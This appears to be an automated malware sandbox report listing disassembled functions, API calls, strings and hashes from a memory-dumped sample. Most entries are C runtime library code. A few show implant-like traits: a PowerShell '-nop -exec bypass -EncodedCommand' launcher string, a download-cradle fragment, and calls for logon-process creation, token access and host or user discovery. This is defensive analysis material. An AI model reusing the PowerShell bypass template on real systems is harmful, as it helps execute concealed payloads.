Function 001BF36C Relevance: 12.6, APIs: 10, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 001BF39A

Part of subcall function 001BE644: _errno.LIBCMT ref: 001BE664

free.LIBCMT ref: 001BF3AF
free.LIBCMT ref: 001BF3D0
free.LIBCMT ref: 001BF3E5
free.LIBCMT ref: 001BF3F9
free.LIBCMT ref: 001BF405
free.LIBCMT ref: 001BF430
free.LIBCMT ref: 001BF451
free.LIBCMT ref: 001BF46A
free.LIBCMT ref: 001BF49B

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: free$_errno
String ID:
API String ID: 2288870239-0
Opcode ID: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
Instruction ID: ddea1815f7091b6444c24c87483e48f1ed0a7c78e2103579739e950a14cedbcc
Opcode Fuzzy Hash: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
Instruction Fuzzy Hash: 5831F635601A8185FE18EF55ECA53EC23A1BBA8BA0F5C0239DD1E0B6A1DF2CC446C351

Function 00401D50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 185COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00401E69

Strings

Address %p has no image-section, xrefs: 00401DC0
VirtualProtect failed with code 0x%x, xrefs: 00401F56
VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
Mingw-w64 runtime failure:, xrefs: 00401D88

Memory Dump Source

Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: 29a604cf87b13a80806d7f9ead845a3010426e0ed6c052ed04d9aa5093f5c340
Instruction ID: 40df73200976b68941168ad0de7a995853c322167ef9a8bb8888d12721705d67
Opcode Fuzzy Hash: 29a604cf87b13a80806d7f9ead845a3010426e0ed6c052ed04d9aa5093f5c340
Instruction Fuzzy Hash: ED51DDB2701B4092DB118F22E98475E77A0F799BE9F54823AEF58173E1EA3CC581C348

Function 001C5834 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 001C585F

Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C

__doserrno.LIBCMT ref: 001C5857

Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC

__lock_fhandle.LIBCMT ref: 001C58A3

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
String ID:
API String ID: 2611593033-0
Opcode ID: 268773e762f2e10da4a59bd6545c27f05d9dc8848c407f150f864121acff7d22
Instruction ID: 634e98f625f9fa467a82c9908df3940d2cda5850be515b119fa48cb2f3079672
Opcode Fuzzy Hash: 268773e762f2e10da4a59bd6545c27f05d9dc8848c407f150f864121acff7d22
Instruction Fuzzy Hash: 56113632B00A8096D7052F66EC42B7D7A22B7B1BA1F5A421DAA150B3D2CB7CD881D720

Function 00686434 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0068645F

Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C

__doserrno.LIBCMT ref: 00686457

Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC

__lock_fhandle.LIBCMT ref: 006864A3

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
String ID:
API String ID: 2611593033-0
Opcode ID: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
Instruction ID: c3f53764061b736138cf567853190568bf4f5ca1a6f594924a029798c2a7fa8e
Opcode Fuzzy Hash: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
Instruction Fuzzy Hash: 7011563270024046E756BF65E85132D7A93AB81BB1F59831DFE251B3D2CB7CC842C729

Function 0068A73C Relevance: 12.1, APIs: 8, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0068A755

Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C

__lock_fhandle.LIBCMT ref: 0068A79D
FlushFileBuffers.KERNEL32 ref: 0068A7B8
GetLastError.KERNEL32 ref: 0068A7C2
__doserrno.LIBCMT ref: 0068A7D2
_errno.LIBCMT ref: 0068A7D9

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errno$BuffersErrorFileFlushLast__doserrno__lock_fhandle_getptd_noexit
String ID:
API String ID: 2289611984-0
Opcode ID: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
Instruction ID: 0d8c8305014683f044f82c85f488e99059061193ed71ff6f56693760bce6f3a0
Opcode Fuzzy Hash: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
Instruction Fuzzy Hash: D811383530064185F716BFE5A8A036D7667AB81B60F19432EDF160B391CB78C882A35A

Function 001C5058 Relevance: 12.1, APIs: 8, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 001C5079

Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C

__doserrno.LIBCMT ref: 001C5071

Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC

__lock_fhandle.LIBCMT ref: 001C50BD
_close_nolock.LIBCMT ref: 001C50D0

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
String ID:
API String ID: 4060740672-0
Opcode ID: 17379182c61e94fbc4142119cfcf5b3e3f43e3e6c30bf76299a690df2e0bdcd6
Instruction ID: 3e54719696332346c6774f72743f91e7305863619329b9cc4123aa14db80aef9
Opcode Fuzzy Hash: 17379182c61e94fbc4142119cfcf5b3e3f43e3e6c30bf76299a690df2e0bdcd6
Instruction Fuzzy Hash: E4113632700A8495D3056F75EC86B6C7A12B7B17A1F6E462CFA1A473D3C7B8C8D18750

Function 00685C58 Relevance: 12.1, APIs: 8, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00685C79

Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C

__doserrno.LIBCMT ref: 00685C71

Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC

__lock_fhandle.LIBCMT ref: 00685CBD
_close_nolock.LIBCMT ref: 00685CD0

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
String ID:
API String ID: 4060740672-0
Opcode ID: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
Instruction ID: 14533b4ae420227cbd097e30d8214636af86d3ccf5c4f633f6a5fb2d41b8138a
Opcode Fuzzy Hash: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
Instruction Fuzzy Hash: 91112932700B8046E756BF65EC9532C7A53AF81761F69472DEE1B4B3D2C7B8C8428B19

Function 001A3A0C Relevance: 11.5, APIs: 9, Instructions: 201COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 001A3AA9

Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708

malloc.LIBCMT ref: 001A3AB3

Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE718
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE71D

malloc.LIBCMT ref: 001A3ABE
free.LIBCMT ref: 001A3C7E
free.LIBCMT ref: 001A3C86
free.LIBCMT ref: 001A3C8E

Part of subcall function 001A48F0: malloc.LIBCMT ref: 001A493A
Part of subcall function 001A48F0: malloc.LIBCMT ref: 001A4945
Part of subcall function 001A48F0: free.LIBCMT ref: 001A4A2C
Part of subcall function 001A48F0: free.LIBCMT ref: 001A4A34

free.LIBCMT ref: 001A3C9A
free.LIBCMT ref: 001A3CA7
free.LIBCMT ref: 001A3CB4

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: free$malloc$_errno$_callnewh
String ID:
API String ID: 4160633307-0
Opcode ID: 930309f8498ff7a349f5473874db00cb4ae22164d30aab4612de4250541046de
Instruction ID: 209368a58deb9e4cad09f9a49730c8180387322b07902ac6a1c357e03485ee58
Opcode Fuzzy Hash: 930309f8498ff7a349f5473874db00cb4ae22164d30aab4612de4250541046de
Instruction Fuzzy Hash: 4D61056630478446DF25EF2698507AFBB91F7A6FD8F044126EE4A57B09DF38C606CB00

Function 0066460C Relevance: 11.5, APIs: 9, Instructions: 201COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 006646A9

Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308

malloc.LIBCMT ref: 006646B3

Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F318
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F31D

malloc.LIBCMT ref: 006646BE
free.LIBCMT ref: 0066487E
free.LIBCMT ref: 00664886
free.LIBCMT ref: 0066488E

Part of subcall function 006654F0: malloc.LIBCMT ref: 0066553A
Part of subcall function 006654F0: malloc.LIBCMT ref: 00665545
Part of subcall function 006654F0: free.LIBCMT ref: 0066562C
Part of subcall function 006654F0: free.LIBCMT ref: 00665634

free.LIBCMT ref: 0066489A
free.LIBCMT ref: 006648A7
free.LIBCMT ref: 006648B4

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: free$malloc$_errno$_callnewh$AllocHeap
String ID:
API String ID: 3534990644-0
Opcode ID: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
Instruction ID: 34910b46c727ce7705f8db602624640e91d5cf5abd5de39ae3148aadea8298a6
Opcode Fuzzy Hash: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
Instruction Fuzzy Hash: 0A61D0227087C586DB65AF669450BAA7B93FB85BC8F448129DE4A47B06DF38C906CB04

Function 001ABE74 Relevance: 10.8, APIs: 6, Strings: 1, Instructions: 296COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001B53EC: malloc.LIBCMT ref: 001B5408

malloc.LIBCMT ref: 001ABF3B

Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708

Part of subcall function 001BB630: _time64.LIBCMT ref: 001BB654
Part of subcall function 001BB630: malloc.LIBCMT ref: 001BB69C
Part of subcall function 001BB630: strtok.LIBCMT ref: 001BB700
Part of subcall function 001BB630: strtok.LIBCMT ref: 001BB711

Part of subcall function 001B28A0: _time64.LIBCMT ref: 001B28AE

Part of subcall function 001BDEA8: malloc.LIBCMT ref: 001BDEF8

Part of subcall function 001BDEA8: realloc.LIBCMT ref: 001BDF07

malloc.LIBCMT ref: 001AC04A
_snprintf.LIBCMT ref: 001AC0C1
_snprintf.LIBCMT ref: 001AC0E7
_snprintf.LIBCMT ref: 001AC10E
free.LIBCMT ref: 001AC2C6

Part of subcall function 001BA144: malloc.LIBCMT ref: 001BA178
Part of subcall function 001BA144: free.LIBCMT ref: 001BA32F

Strings

/'); %s, xrefs: 001AC0B2, 001AC0DA, 001AC0F1

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: malloc$_snprintf$_errno_time64freestrtok$_callnewhrealloc
String ID: /'); %s
API String ID: 1314452303-1283008465
Opcode ID: a14b20026d747f2b5753e6fc705179295a1c2f23b63bad27e5059ac536f54d83
Instruction ID: 2e1e53b0162e0ebcb552ed176464fe12739a6b053966d81585ff3166033a2d9c
Opcode Fuzzy Hash: a14b20026d747f2b5753e6fc705179295a1c2f23b63bad27e5059ac536f54d83
Instruction Fuzzy Hash: 0DA1D13530068186DB18FBB2E8917EE7392ABA67C1F804125FE5A47796DF3CC806C741

Function 0067B47C Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 258COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008

malloc.LIBCMT ref: 0067B528

Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308

Part of subcall function 0067EAA8: malloc.LIBCMT ref: 0067EAF8

GetComputerNameExA.KERNEL32 ref: 0067B5EA
GetComputerNameA.KERNEL32 ref: 0067B61F
GetUserNameA.ADVAPI32 ref: 0067B654

Part of subcall function 0066F014: WSASocketA.WS2_32 ref: 0066F042

malloc.LIBCMT ref: 0067B76D

Strings

VUUU, xrefs: 0067B6B0

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: malloc$Name$Computer_errno$AllocHeapSocketUser_callnewh
String ID: VUUU
API String ID: 632458648-2040033107
Opcode ID: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
Instruction ID: d29d9931251baad784a1826376812f60e93414938d2a0f9df4c39f6f065345ae
Opcode Fuzzy Hash: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
Instruction Fuzzy Hash: 69913636700A9086EB44EF6AD8653AD2353BB89BC4FC0D029EE0D5BB56DF39C945C704

Function 001AE004 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 165COMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 001AE0D3
_snprintf.LIBCMT ref: 001AE0FE
_snprintf.LIBCMT ref: 001AE11A
_snprintf.LIBCMT ref: 001AE1CF
_snprintf.LIBCMT ref: 001AE1E6

Strings

rshell -nop -exec bypass -EncodedCommand "%s", xrefs: 001AE02A
/'); %s, xrefs: 001AE0CA, 001AE0F5, 001AE1C4

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _snprintf
String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
API String ID: 3512837008-1250630670
Opcode ID: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
Instruction ID: 6a465962cabf8489c5691470ad028bed19716a351b7ab40bfcc4a69e4c0c2c17
Opcode Fuzzy Hash: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
Instruction Fuzzy Hash: 7A719976300B85A6EB10DF61E8807ED77A1F799788F840526EE4E13BA8DF78C509C700

Function 00671478 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128processCOMMON

Download Yara Rule

APIs

Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008

GetStartupInfoA.KERNEL32 ref: 00671540

Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FE81
Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FEA9

GetCurrentDirectoryW.KERNEL32 ref: 006715CD
GetCurrentDirectoryW.KERNEL32 ref: 006715DC
CreateProcessWithLogonW.ADVAPI32 ref: 00671637
GetLastError.KERNEL32 ref: 00671641

Strings

%s as %s\%s: %d, xrefs: 00671647

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: ByteCharCurrentDirectoryMultiWide$CreateErrorInfoLastLogonProcessStartupWithmalloc
String ID: %s as %s\%s: %d
API String ID: 3435635427-816037529
Opcode ID: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
Instruction ID: 80a158382953b88b06e520f675666d0f8cd5c6e7d3343fb356ae6e5c51471de1
Opcode Fuzzy Hash: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
Instruction Fuzzy Hash: 35515A32204B8186DB60DF16F85475AB7AAF789B80F54802AEF8D97F29DF39C055CB44

Function 001B0A94 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 001B53EC: malloc.LIBCMT ref: 001B5408

Part of subcall function 001BFA20: _errno.LIBCMT ref: 001BF977
Part of subcall function 001BFA20: _invalid_parameter_noinfo.LIBCMT ref: 001BF982

fseek.LIBCMT ref: 001B0B30

Part of subcall function 001C02A4: _errno.LIBCMT ref: 001C02CC
Part of subcall function 001C02A4: _invalid_parameter_noinfo.LIBCMT ref: 001C02D7

_ftelli64.LIBCMT ref: 001B0B38

Part of subcall function 001C0318: _errno.LIBCMT ref: 001C0336
Part of subcall function 001C0318: _invalid_parameter_noinfo.LIBCMT ref: 001C0341

fseek.LIBCMT ref: 001B0B48

Part of subcall function 001C02A4: _fseek_nolock.LIBCMT ref: 001C02F5

malloc.LIBCMT ref: 001B0B88

Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708

Part of subcall function 001AC444: malloc.LIBCMT ref: 001AC457

fclose.LIBCMT ref: 001B0C45

Strings

mode, xrefs: 001B0B07

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfomalloc$fseek$_callnewh_fseek_nolock_ftelli64fclose
String ID: mode
API String ID: 1756087678-2976727214
Opcode ID: f827565397daa4a866320a6784096609c7711a7c42725b9a2a2b01c24697e092
Instruction ID: 90d0e5ddde56df2123dc45e1f2ef815405a37f99bc65f5c34af3800dbad401eb
Opcode Fuzzy Hash: f827565397daa4a866320a6784096609c7711a7c42725b9a2a2b01c24697e092
Instruction Fuzzy Hash: B541D82631468082DB14EB12E8557AE7752F7EDBD0F808226EE5E47B96DF3CC506CB40

Function 001B8620 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 001B864F

Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708

_snprintf.LIBCMT ref: 001B8667

Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E

free.LIBCMT ref: 001B867E

Part of subcall function 001BE644: _errno.LIBCMT ref: 001BE664

malloc.LIBCMT ref: 001B86CE
_snprintf.LIBCMT ref: 001B86E6
free.LIBCMT ref: 001B870E

Strings

/'); %s, xrefs: 001B86D3

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
String ID: /'); %s
API String ID: 761449704-1283008465
Opcode ID: 6cfeb8f42d39390d21f7f655b5309285a784ce0f998201f3a4c834a9ff33a05d
Instruction ID: 53664babb93e745c368a5b9844ddd80b759a732194ffa29d953fd55d02d63f9f
Opcode Fuzzy Hash: 6cfeb8f42d39390d21f7f655b5309285a784ce0f998201f3a4c834a9ff33a05d
Instruction Fuzzy Hash: 193135213006C125DA199FA36C143E9BB66B79AFE4F984112DEE507BA6CF3CC443C300

Function 0067E98C Relevance: 10.6, APIs: 7, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0067E9D7
OpenProcessToken.ADVAPI32 ref: 0067E9FB
GetLastError.KERNEL32 ref: 0067EA05

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: ErrorLast$OpenProcessToken
String ID:
API String ID: 2009710997-0
Opcode ID: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
Instruction ID: be70d9a1b9824e6d91bdd001a0645cfd12320119953c9e94c73a6e9c154cd505
Opcode Fuzzy Hash: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
Instruction Fuzzy Hash: 0C21C425304B0186EB54AF62E46475A67A3FBC8BA4F14803CAE4E43B15DF3EC44ACB84

Function 001BF210 Relevance: 10.6, APIs: 7, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 001BF236

Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C

_invalid_parameter_noinfo.LIBCMT ref: 001BF242
__crtIsPackagedApp.LIBCMT ref: 001BF253
_dosmaperr.LIBCMT ref: 001BF29D

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 2917016420-0
Opcode ID: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
Instruction ID: 3ed8b6cf709debf8d3d5eb5d30d3862baa036c4a4594f282fce4260f8f547789
Opcode Fuzzy Hash: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
Instruction Fuzzy Hash: 0821CF36300B4096EB14AF76AC153ADB7E1FBA9BA4F184639EE49437A5DF3CC4428700

Function 001CEFD0 Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001CF004

Part of subcall function 001C0A00: _getptd.LIBCMT ref: 001C0A16
Part of subcall function 001C0A00: __updatetlocinfo.LIBCMT ref: 001C0A4B
Part of subcall function 001C0A00: __updatetmbcinfo.LIBCMT ref: 001C0A72

_errno.LIBCMT ref: 001CF01F
_invalid_parameter_noinfo.LIBCMT ref: 001CF02A

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
String ID:
API String ID: 3191669884-0
Opcode ID: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
Instruction ID: 0ce4bd91c6ac52b6e23cc360a9f001d43c82dac6a01da28f891c7d467d7c2d83
Opcode Fuzzy Hash: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
Instruction Fuzzy Hash: 45218B722047848AD7109F52D485F69B7A6F7A9FE0F69823DEF5807B46CB34C856CB00

Function 0068FBD0 Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0068FC04

Part of subcall function 00681600: _getptd.LIBCMT ref: 00681616
Part of subcall function 00681600: __updatetlocinfo.LIBCMT ref: 0068164B
Part of subcall function 00681600: __updatetmbcinfo.LIBCMT ref: 00681672

_errno.LIBCMT ref: 0068FC1F
_invalid_parameter_noinfo.LIBCMT ref: 0068FC2A

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
String ID:
API String ID: 3191669884-0
Opcode ID: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
Instruction ID: d3b0a8c39b02e232e219af6ac56bdc75e73b4ff08cdd2bd878a79b47920382d2
Opcode Fuzzy Hash: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
Instruction Fuzzy Hash: 482183723047888AD761AF11D48469EB7A6FB95BE0F684335EF5817B55CB34CA82C700

Function 0067596C Relevance: 10.6, APIs: 7, Instructions: 52COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0067597D
ioctlsocket.WS2_32 ref: 0067599E
GetTickCount.KERNEL32 ref: 006759E3
